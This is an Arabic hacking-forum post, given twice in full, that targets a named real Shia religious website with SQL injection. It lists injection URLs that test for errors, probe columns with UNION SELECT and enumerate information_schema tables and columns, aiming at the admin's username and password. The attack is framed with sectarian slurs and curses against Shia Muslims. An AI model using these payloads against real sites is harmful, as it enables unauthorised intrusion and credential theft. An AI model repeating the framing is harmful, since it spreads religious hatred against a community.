DR.THMoORY
New Member
!! إستهداف موقع ارتباط الروافض الشيعه بالسستاني !!
[align=center]السلام عليكم ورحمة الله وبركاته
إستهداف موقع ارتباط الروافض بالسستاني لعنهم الله
الموقع المستهدف
www.najaf.org
نوع الثغره
sql injection
لكي نتاكد انو الموقع يحتوي عل خطئ في قاعدة البيانات
نقوم بعمل خطأ في قاعدة البيانات
http://www.najaf.org/mail/us_index.php?l=1'
هع لدينا خطأ في القاعده
في الرقم الأول جيت اضفت
كود PHP:
http://www.najaf.org/mail/us_index.php?l=-1'+union+select+1,2,3,4,5,6,7/*
بعد ان قمن باضافة الارقام اختفى الخطى وظهر الرقم 2
الآن نضيف هذا الاستثمار
كود PHP:
http://www.najaf.org/mail/us_index....me,3,4,5,6,7+from+information_schema.tables/*
اسماء الجداول في قاعدة بيانات الموقع
البحث في الجداول للحصول على يوزر و باس الادمن
وممكن نتوسع في الاستغلال والبركه في القراصنه
الان التنقل بين الاعمدة
كود PHP:
http://www.najaf.org/mail/us_index....me,3,4,5,6,7+from+information_schema.tables/*
العمود الموجود في التابل باسم
columns
جآري التلاعب والتنقل بهذا الاستثمار
كود PHP:
http://www.najaf.org/mail/us_index....e,3,4,5,6,7+from+information_schema.COLUMNs/*
الان الاستثمار والتنقل إلى العمود COLLATION
وهذا العمود مطلوب
كود PHP:
http://www.najaf.org/mail/us_index....,4,5,6,7+from+information_schema.COLLATIONs/*
[/align]
:a12:
إستهداف موقع ارتباط الروافض بالسستاني لعنهم الله
الموقع المستهدف
www.najaf.org
نوع الثغره
sql injection
لكي نتاكد انو الموقع يحتوي عل خطئ في قاعدة البيانات
نقوم بعمل خطأ في قاعدة البيانات
http://www.najaf.org/mail/us_index.php?l=1'
هع لدينا خطأ في القاعده
في الرقم الأول جيت اضفت
كود PHP:
http://www.najaf.org/mail/us_index.php?l=-1'+union+select+1,2,3,4,5,6,7/*
بعد ان قمن باضافة الارقام اختفى الخطى وظهر الرقم 2
الآن نضيف هذا الاستثمار
كود PHP:
http://www.najaf.org/mail/us_index....me,3,4,5,6,7+from+information_schema.tables/*
اسماء الجداول في قاعدة بيانات الموقع
البحث في الجداول للحصول على يوزر و باس الادمن
وممكن نتوسع في الاستغلال والبركه في القراصنه
الان التنقل بين الاعمدة
كود PHP:
http://www.najaf.org/mail/us_index....me,3,4,5,6,7+from+information_schema.tables/*
العمود الموجود في التابل باسم
columns
جآري التلاعب والتنقل بهذا الاستثمار
كود PHP:
http://www.najaf.org/mail/us_index....e,3,4,5,6,7+from+information_schema.COLUMNs/*
الان الاستثمار والتنقل إلى العمود COLLATION
وهذا العمود مطلوب
كود PHP:
http://www.najaf.org/mail/us_index....,4,5,6,7+from+information_schema.COLLATIONs/*
[/align]
:a12:
اسم الموضوع : !! إستهداف موقع ارتباط الروافض الشيعه بالسستاني !!
|
المصدر : SQL قواعد البيانات